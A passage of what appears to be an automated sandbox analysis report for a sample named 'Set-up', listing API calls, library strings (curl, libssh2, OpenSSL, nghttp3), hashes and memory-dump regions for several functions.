                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$atoistrcpy
                          • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s$transfer.c
                          • API String ID: 2444498485-4197959747
                          • Opcode ID: fd324b39de2d82eee49299873d4017b931ce6138ac52e08899a198ea0ef00bc1
                          • Instruction ID: 44a58dd982b68cfbdb8b0a912803bd21dbc0dc2090a111fa35eb724132aa7edf
                          • Opcode Fuzzy Hash: fd324b39de2d82eee49299873d4017b931ce6138ac52e08899a198ea0ef00bc1
                          • Instruction Fuzzy Hash: 4CF1E175A003006BEB20DF24DD86BAA3B95AF59704F08C4B5FD4DAE2D3E771D91487A2
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00C5A61C
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ENCRYPTED PRIVATE KEY), ref: 00C5A632
                            • Part of subcall function 00C5A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00C5A654,?,PRIVATE KEY), ref: 00C5A0BD
                            • Part of subcall function 00C5A0B0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,PRIVATE KEY), ref: 00C5A0C8
                            • Part of subcall function 00C5A0B0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,PRIVATE KEY), ref: 00C5A0DF
                            • Part of subcall function 00BD38A0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00BD397E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strcmpstrlen
                          • String ID: ANY PRIVATE KEY$ENCRYPTED PRIVATE KEY$PARAMETERS$PEM$PRIVATE KEY$PUBLIC KEY$crypto/pem/pem_pkey.c$pem_read_bio_key_decoder$pem_read_bio_key_legacy
                          • API String ID: 3853617425-3686562516
                          • Opcode ID: 14fb14fd694e185e5254d4a95958bb3415e14243c7b763182fe08ac6bfeac54d
                          • Instruction ID: 433cb530b7ce3e167c097ffaf50e1a7fe8df0a3f8c3725a3aad9e529d8095ff3
                          • Opcode Fuzzy Hash: 14fb14fd694e185e5254d4a95958bb3415e14243c7b763182fe08ac6bfeac54d
                          • Instruction Fuzzy Hash: 51D130B6E043007BD7217A219C03F5F76E89F95745F040628FD58A7183FA71ED8896A7
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000010,?,00000100), ref: 00B4C60E
                          Strings
                          • Would block sending FXP_OPEN or FXP_OPENDIR command, xrefs: 00B4C410
                          • Response too small, xrefs: 00B4C4E3
                          • feWould block waiting for status message, xrefs: 00B4C4A6
                          • Unable to allocate new SFTP handle structure, xrefs: 00B4C646
                          • Too small FXP_HANDLE, xrefs: 00B4C582, 00B4C675
                          • Too small FXP_STATUS, xrefs: 00B4C517
                          • Timeout waiting for status message, xrefs: 00B4C4FB
                          • Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet, xrefs: 00B4C444
                          • Failed opening remote file, xrefs: 00B4C531
                          • Unable to send FXP_OPEN*, xrefs: 00B4C45B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: Failed opening remote file$Response too small$Timeout waiting for status message$Too small FXP_HANDLE$Too small FXP_STATUS$Unable to allocate memory for FXP_OPEN or FXP_OPENDIR packet$Unable to allocate new SFTP handle structure$Unable to send FXP_OPEN*$Would block sending FXP_OPEN or FXP_OPENDIR command$feWould block waiting for status message
                          • API String ID: 3510742995-1499184223
                          • Opcode ID: eadb3b8a81fe9fa7c47637444da73006b78bce169ce5950075f560ef655d678c
                          • Instruction ID: 1c5177a3cfa7001d557ce64999b8a06925c32d471174333adbc20bd51e8e3b57
                          • Opcode Fuzzy Hash: eadb3b8a81fe9fa7c47637444da73006b78bce169ce5950075f560ef655d678c
                          • Instruction Fuzzy Hash: 10B14AB09047419FDB10CF24DC81B6B7BE8FF94718F044A6CF45692292E771DA18DB62
                          APIs
                          • strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002F,?,?,?,?,?,00000000,?,?,?,?,?,?,00AACC57), ref: 00AAF028
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strrchr
                          • String ID: %s%s%s$LIST$NLST$SIZE %s$STOR_PREQUOTE$TYPE %c$[%s] -> [%s]$ftp.c
                          • API String ID: 3418686817-2910492138
                          • Opcode ID: 0fd495040c0aaabc69a228cbd980dd3b6ef6fe1d98e7aea260fc269a4611512b
                          • Instruction ID: f8bf770789b21a52495c0552c63aaf5f6272ff733d52022ef0d63906d1592db6
                          • Opcode Fuzzy Hash: 0fd495040c0aaabc69a228cbd980dd3b6ef6fe1d98e7aea260fc269a4611512b
                          • Instruction Fuzzy Hash: 06A101B1700304ABEB259B689C05BA776D9EB93308F0C417DE9498B2C3E3B6DD45D7A0
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00A91887,?,?,00000000,?,00000000,00000007), ref: 00B4E43D
                          Strings
                          • Server does not support RENAME, xrefs: 00B4E4B9
                          • SFTP Protocol Error, xrefs: 00B4E63E
                          • SFTP rename packet too short, xrefs: 00B4E5F9
                          • Error waiting for FXP STATUS, xrefs: 00B4E64F
                          • File already exists and SSH_FXP_RENAME_OVERWRITE not specified, xrefs: 00B4E673
                          • Operation Not Supported, xrefs: 00B4E67A
                          • Unable to allocate memory for FXP_RENAME packet, xrefs: 00B4E66A
                          • Unable to send FXP_RENAME command, xrefs: 00B4E661
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _time64
                          • String ID: Error waiting for FXP STATUS$File already exists and SSH_FXP_RENAME_OVERWRITE not specified$Operation Not Supported$SFTP Protocol Error$SFTP rename packet too short$Server does not support RENAME$Unable to allocate memory for FXP_RENAME packet$Unable to send FXP_RENAME command
                          • API String ID: 1670930206-3556387644
                          • Opcode ID: b05525d405267684a4149e477c4a6bbc5bbfebde54639082359bf363d88b3843
                          • Instruction ID: 1a2f06a32b9ddeeeae089093bc8c9618d502469dd3b2546bed7ee4e611de4b96
                          • Opcode Fuzzy Hash: b05525d405267684a4149e477c4a6bbc5bbfebde54639082359bf363d88b3843
                          • Instruction Fuzzy Hash: 7671D571604300AFD7209F24DC85B6B7BE4FF51314F05499DF9AA872A2E731DA14EB62
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00B0A9E8
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < blk->n,nghttp3_ksl.c,000002C3,?,?,?,?,?,00B071B7,00000001,?,?), ref: 00B0AA04
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key),nghttp3_ksl.c,000002C7,?,00B071B7,00000001,?,?), ref: 00B0AA19
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ksl->head,nghttp3_ksl.c,000002BE,?,?,?,?,?,00B071B7,00000001,?,?), ref: 00B0AA2E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _assert$memcpy
                          • String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
                          • API String ID: 3718630003-2514804127
                          • Opcode ID: 2e310be10c768c0484b7a062b0d55ab417a4e15a2f5bf66a80946c431bd3ca1a
                          • Instruction ID: c93e7e3432fb643edb5362777902ea8f37728e2e9f9c34ef942a920d7fc8ad4c
                          • Opcode Fuzzy Hash: 2e310be10c768c0484b7a062b0d55ab417a4e15a2f5bf66a80946c431bd3ca1a
                          • Instruction Fuzzy Hash: 75418A712043089FDB00DF15CD85F5A7BE5FF58349F0A4898E4899B2A2E732D959CB63
                          APIs
                          • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00CA238F
                          • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00CA23C4
                          • GetLastError.KERNEL32 ref: 00CA2433
                            • Part of subcall function 00CA2240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00C9F763,?,?,?,?,?), ref: 00CA2251
                            • Part of subcall function 00CA2240: WideCharToMultiByte.KERNEL32 ref: 00CA2284
                            • Part of subcall function 00CA2240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00CA22BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
                          • String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
                          • API String ID: 3049598375-4146664032
                          • Opcode ID: 8d74e6bff823e8e20886849e5515c7e79ae213839e236170e927897782a4825a
                          • Instruction ID: 401a071d88855f26b2034b99a1afd8ba40e3564859d0005a91abe15a94497724
                          • Opcode Fuzzy Hash: 8d74e6bff823e8e20886849e5515c7e79ae213839e236170e927897782a4825a
                          • Instruction Fuzzy Hash: 7F21EB71B403017BE6203666BC47F3B356DDB97F09F004538FA48AD1C7E69A4615A6A2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A90794
                            • Part of subcall function 00B4F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00A900B0,?,?,00000000,00000000,?), ref: 00B4F35D
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00A9356E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_time64
                          • String ID: Bad file size (%lld)$Could not seek stream$Creating the dir/file failed: %s$Failed to read data$Unknown error in libssh2$Upload failed: %s (%lu/%d)$ssh error
                          • API String ID: 2413861649-3110757985
                          • Opcode ID: 7ba05ad47c80bbb4f3cecb0f8df3bbd7a3ad213487104f967d308a6422e40b17
                          • Instruction ID: 89884c645fd719a4767e04b3bc295b76abbdd6089801e14a6b1c85106cee2358
                          • Opcode Fuzzy Hash: 7ba05ad47c80bbb4f3cecb0f8df3bbd7a3ad213487104f967d308a6422e40b17
                          • Instruction Fuzzy Hash: CCE19EB1B046019FDB14DF28C885F6AB7E5BB88304F148678F9598B352DB71AE05CB92
                          APIs
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC491A
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC497C
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC49F1
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4ABB
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4B21
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4BCF
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4C33
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00AC4CDD
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00AC4D30
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memchr
                          • String ID: 0123456789
                          • API String ID: 3297308162-2793719750
                          • Opcode ID: cf5b32a2119551d57964404c13ae23e58d77abd82638bc7c5cc3cbc11b2838ca
                          • Instruction ID: 9f8e1a0f9c78e0c24a231951dcf7e8c79b681b545bee5bd1f63e9997cc4fd621
                          • Opcode Fuzzy Hash: cf5b32a2119551d57964404c13ae23e58d77abd82638bc7c5cc3cbc11b2838ca
                          • Instruction Fuzzy Hash: 74B117616883A15EDB259F1884B0FB67BD48F5A784F0A406DDDC48B3C3D729CD0A972A
                          APIs
                            • Part of subcall function 00C3B4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B4CA
                            • Part of subcall function 00C3B4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B4D4
                            • Part of subcall function 00C3B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00C47667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B53B
                            • Part of subcall function 00C3B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00C47667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B5A1
                            • Part of subcall function 00C3B4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B5B4
                            • Part of subcall function 00C3B4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B648
                            • Part of subcall function 00C3B4B0: WideCharToMultiByte.KERNEL32 ref: 00C3B67F
                            • Part of subcall function 00C3B4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00C47667,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B504
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00BCA1F0
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00BCA20B
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 00BCA25D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
                          • String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
                          • API String ID: 2744062652-2540125403
                          • Opcode ID: f9524956d515c9f6a42a893972e435905a0524bed7beb4859838f6601774b384
                          • Instruction ID: 907b0ba6ea1289f91f0c74e22a87b36334b0d88190cd53d6c16f9c98fe49d8b9
                          • Opcode Fuzzy Hash: f9524956d515c9f6a42a893972e435905a0524bed7beb4859838f6601774b384
                          • Instruction Fuzzy Hash: 1F51E3E1A0435C6FE710A6259C46F3B76D99F90708F0804BCF98D9A243F669ED1497A3
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00A8284C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
